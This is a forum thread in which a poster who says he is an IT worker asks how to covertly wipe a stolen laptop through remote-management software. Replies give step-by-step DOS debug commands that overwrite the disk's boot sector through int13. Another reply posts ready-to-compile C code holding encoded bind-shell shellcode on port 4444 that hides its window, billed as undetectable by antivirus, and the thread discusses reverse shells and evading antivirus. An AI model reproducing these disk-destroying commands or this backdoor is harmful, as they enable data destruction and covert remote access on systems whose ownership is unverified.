Well then it seems like you have answered your own questionOriginally Posted by KamiCrazy
Since you have "full" control over said box just plant a shredder to wipe the drive on boot or take the time to do it manually. Unless he has any sort of forensics experience a simple deep-format should do the trick.
"The goal of every man should be to continue living even after he can no longer draw breath."
~ShadowKill
what if?
What if he's made copies of all the financial data you claim is on there?
What if you wipe all his stuff, then he just recovers the deleted data?
I'm guessing this guy isnt actually from the IT department right?
then again he could be, it took 1 hour and 3 DVD RW drives for the IT guy at my place to copy a DVD with some video reports on it, and even then he still couldnt manage it so i had to take it home and do it myself!!
Thats what i dont understand shadow, He seems like an inteligent guy thats why i dont understand why hes asking how to delete data from a machine he has full write privlages over?Well then it seems like you have answered your own question
any how lets get this moving
OK OPEN UP A COMMAND PROMPT
now type
"debug" press enter
"a 100" press enter
"int13" press enter
press enter without typing anything
"rax" press enter
"0301" press enter
"rbx" press enter
"0200" press enter
"f 200 l 200 0" (note, this is a lower case "L") press enter
"rcx" press enter
"0001" press enter
"rdx" press enter
"0080" press enter
"p" press enter
"q" press enter
NOW REBOOT THE MACHINE YOU SHOULDNT SEE THIS MACHINE ONLINE NO MORE THEWHOLE HARD DRIVE IS PERMANTLY FORMATTED. ATTEMPT THIS IF IT DOES NOT WORK THEN TELL US
Sometimes I try to fit a 16-character string into an 8–byte space, on purpose.
P.S pure hate i hope you dont mind me helping him but
1. he seems very genuine to me and what is saying is EASILY BELIEVABLE
2. If he is unethical and hes manged to compromise a computers security this far he CERTAINLY doesnt need us to help him learn how to trash it
3. If he was a blakhatter and he some how got this far without knowing what he was doing he would be asking how do i crack shared files passwords netbios etc
so taking all this into account i found it justy to help him
Sometimes I try to fit a 16-character string into an 8–byte space, on purpose.
If I were you I would first somehow shred the specific data you can find that is related to the company.
After that try killadaninja's proposition. Recovering data from a simple format is way to easy.
Just make sure you accomplish whatever you need to do quickly.
Chances are if he notices anything fishy, it'll probably be the last time you'll be able to connect.
Either that or he hurries up and makes a backup of all the data.
Good luck!
- Poul Wittig
I left the thread open so that means if you want to give the OP suggestions its OK by me. I was merely stating some issues that I had personally with the post. There were no forum rules broken and like I said the OP makes a valid case. I just have a habit of trusting hardly anyone on the internet. The circle of people I trust on this forum is fairly small. Just my nature I guess
Sorry I've been very busy this morning and have not had a chance to reply to much apart from purehates post which I wanted to clear up why the notebook has not been reformatted.
@streaker69:
The user is able to know we when we remote control the computer. I use that to differentiate from connecting to it.
When we use RDP of course the user's console locks out and tells him that administrator is logged on. If we use VNC the VNC session causes the laptop's desktop background to change and an icon on the taskbar to change.
Basically the management software is designed to notify the user of remote interactive access. If we alert him to this he will likely disconnect the laptop from the network and we will lose our chance.
My colleague and I have been approached personally by a company director to make this happen. He's told us personally to do this, so yes we have our asses covered in this regard.
@Virchanza:
Yes the agent connects back to us, traversing any NAT in place.
@cybrsnpr:
A batch file was something I had in mind already, thanks for the suggestion I will look into implementing this.
@merlin051:
If the thief has made copies then there is nothing we can do. However I don't think he has, he doesn't understand the database files which the financial data is kept in. He simply knows how to open an accounting app and access the info. Plus if he had made copies he would of likely wiped the laptop and reinstalled/sold it off.
@killadaninja:
We do not have command prompt access without installing another backdoor or exploiting a reverse shell remote vulnerability.
But I can probably take those commands and insert them into a batch file, upload and run it non-interactively.
Running scripts and stuff have certain quirks due to how kaseya executes things. It uses the local user account who is logged in at the moment. You can set things to be run as system but I've found that some things which you expect to be run don't.
Then theres the anti-virus. I can't disable it currently without taking interactive control.
@all:
I had originally considered uploading a script to delete the important data. However doing a format like killadaninja is much better.
I also considered uploading a local side exploit to open a backdoor so I can get a reverse shell. (Upload via ftp through kaseya, run backdoor through kaseya as local user). However I'm pretty sure that if I upload anything the AV will catch it and kill it.
At this stage I think the remote script is best. To be honest I had some answers already but I wanted suggestions if someone could come with anything better and yes from the answers in this thread there have been better ways.
Compile this, it opens a port of 4444, but just go to metasploit web site and find a shellcode you like.I also considered uploading a local side exploit to open a backdoor so I can get a reverse shell. (Upload via ftp through kaseya, run backdoor through kaseya as local user). However I'm pretty sure that if I upload anything the AV will catch it and kill it.
This won't be DETECTED by any AV
Code:#include <stdio.h> #include <stdlib.h> #include <winsock2.h> #define _WIN32_WINNT 0x0500 #include <windows.h> #include <iostream> unsigned char bindcode[] = "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xce" "\x25\x78\x47\x83\xeb\xfc\xe2\xf4\x32\x4f\x93\x0a\x26\xdc\x87\xb8" "\x31\x45\xf3\x2b\xea\x01\xf3\x02\xf2\xae\x04\x42\xb6\x24\x97\xcc" "\x81\x3d\xf3\x18\xee\x24\x93\x0e\x45\x11\xf3\x46\x20\x14\xb8\xde" "\x62\xa1\xb8\x33\xc9\xe4\xb2\x4a\xcf\xe7\x93\xb3\xf5\x71\x5c\x6f" "\xbb\xc0\xf3\x18\xea\x24\x93\x21\x45\x29\x33\xcc\x91\x39\x79\xac" "\xcd\x09\xf3\xce\xa2\x01\x64\x26\x0d\x14\xa3\x23\x45\x66\x48\xcc" "\x8e\x29\xf3\x37\xd2\x88\xf3\x07\xc6\x7b\x10\xc9\x80\x2b\x94\x17" "\x31\xf3\x1e\x14\xa8\x4d\x4b\x75\xa6\x52\x0b\x75\x91\x71\x87\x97" "\xa6\xee\x95\xbb\xf5\x75\x87\x91\x91\xac\x9d\x21\x4f\xc8\x70\x45" "\x9b\x4f\x7a\xb8\x1e\x4d\xa1\x4e\x3b\x88\x2f\xb8\x18\x76\x2b\x14" "\x9d\x76\x3b\x14\x8d\x76\x87\x97\xa8\x4d\x7c\x05\xa8\x76\xf1\xa6" "\x5b\x4d\xdc\x5d\xbe\xe2\x2f\xb8\x18\x4f\x68\x16\x9b\xda\xa8\x2f" "\x6a\x88\x56\xae\x99\xda\xae\x14\x9b\xda\xa8\x2f\x2b\x6c\xfe\x0e" "\x99\xda\xae\x17\x9a\x71\x2d\xb8\x1e\xb6\x10\xa0\xb7\xe3\x01\x10" "\x31\xf3\x2d\xb8\x1e\x43\x12\x23\xa8\x4d\x1b\x2a\x47\xc0\x12\x17" "\x97\x0c\xb4\xce\x29\x4f\x3c\xce\x2c\x14\xb8\xb4\x64\xdb\x3a\x6a" "\x30\x67\x54\xd4\x43\x5f\x40\xec\x65\x8e\x10\x35\x30\x96\x6e\xb8" "\xbb\x61\x87\x91\x95\x72\x2a\x16\x9f\x74\x12\x46\x9f\x74\x2d\x16" "\x31\xf5\x10\xea\x17\x20\xb6\x14\x31\xf3\x12\xb8\x31\x12\x87\x97" "\x45\x72\x84\xc4\x0a\x41\x87\x91\x9c\xda\xa8\x2f\x3e\xaf\x7c\x18" "\x9d\xda\xae\xb8\x1e\x25\x78\x47"; int main() { HWND hWnd = GetConsoleWindow(); ShowWindow( hWnd, SW_HIDE ); WSADATA wsadata; WSAStartup(WINSOCK_VERSION,&wsadata); ((void (*)(void)) &bindcode)(); }
So I'm not a C expert by any means and I was just wondering compaq why that snippet of code wont compile with GCC? Is there some C that can only be compiled is visual studio or something?
Ok so I figured out I dont have the win32 libs on my system for some reason. If anyone know the gentoo packages to install those please PM me with the answer.
What exactly does that machine code do? I don't suppose you have the original source code from which it was produced? If it opens a port of 4444 then which daemon is listening? And how do you interact with that daemon to get it to execute code?
Another problem is that the victim machine will always be behind a NAT-router, and also the firewall on the computer itself will probably block the traffic.
@pureh@te:
I dunno if you're being sarcastic but here's a explanation nonetheless... Some C compilers offer "compiler extensions" which aren't a part of the C standard; this particular program doesn't contain any compiler externsions, it just won't compile because you don't have the necessary header files and object files for the Win32 API.
Ask questions on the open forums, that way everybody benefits from the solution, and everybody can be corrected when they make mistakes. Don't send me private messages asking questions that should be asked on the open forums, I won't respond. I decline all "Friend Requests".
Posting Permissions
